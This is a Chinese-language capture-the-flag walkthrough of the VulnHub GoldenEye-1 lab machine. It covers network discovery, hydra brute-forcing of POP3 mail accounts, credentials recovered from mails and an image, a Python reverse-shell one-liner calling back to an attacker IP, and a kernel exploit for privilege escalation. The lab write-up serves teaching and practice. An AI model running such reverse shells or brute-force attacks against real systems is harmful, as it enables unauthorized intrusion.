本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/goldeneye-1,240/
有开放80端口,直接访问下web看看
根据上述提示知道一个访问路径/sev-home/ 访问看看
查看页面信息和所在网页的源码发现如下有价值的信息
反馈了目标靶机开放了一个非默认的高端口邮件服务器,因为根据我们上面nmap扫描的结果,nmap给出的结果中有一个高端口标记的是pop协议服务,那我们访问看看
根据页面显示,可知邮件服务访问正常,我们得知道目标邮件的服务器账户和密码,拿起hydra进行暴力破解操作,因为上面已经得知两个用户名boris,natalya ,所以使用这两个用户名使用kali密码进行暴力破解,这里使用rockyou密码字典使用了比较长的时间没有暴力破解成功,最后使用了fasttrack.txt, 进行暴力破解成了,获得了用户名和密码,分别是:
用户:boris/secret1!
用户:natalya/bird
得到上面账户和密码那么我们使用nc或者telnet命令访问看看
最终使用用户名为natalya得到了一份有价值的信息,一个信息的用户名和密码,并且提示一个域名需要绑定hosts访问
username: xenia
password: RCP90rulez!
需要绑定hosts的域名severnaya-station.com
绑定域名之后直接登录发现了一封邮件信息
通过邮件讯息发现用户名doak 使用hydra进行暴力得出如下密码
进入邮箱查看邮件讯息
发现账号和密码
username: dr_doak
password: 4England!
使用这个账户密码登陆目标web,发现如下信息:
知道这个路径之后,访问看看
图片表面没看到什么有价值的信息,下载下来看看是否存在隐藏信息
下载完成之后,使用strings命令看看是否有隐藏内容
果然发现了一个经过base64编码的信息,尝试使用brup进行解码看看
上面解码的信息是密码信息,根据目标靶机提供的信息,猜测此密码信息就是管理员,且知道目标靶机admin作为管理员
xWinter1995x!
登陆之后调整目标靶机的web使用的shell
配置Python的反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.5.130",8856));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
执行shell进行反弹
本地监听反弹shell的端口8856
成功反弹shell,获取tty-shell
在键盘上按住Ctrl+Z
此时便退出了当前的反弹shell
在当前的shell 执行 stty raw -echo
fg
尝试进行提权,在谷歌上对应的版本号的exploit
https://www.exploit-db.com/exploits/37292 对应的exp,可以在这里下载,也可以根据编号直接在kali本地直接搜索
测试了下,目标靶机没有gcc环境,那么这里可以使用cc编译环境进行编译生成,首先将exp代码下载到目标靶机上去
在目标靶机上使用cc进行编译成功之后,直接执行提权成功获取falg
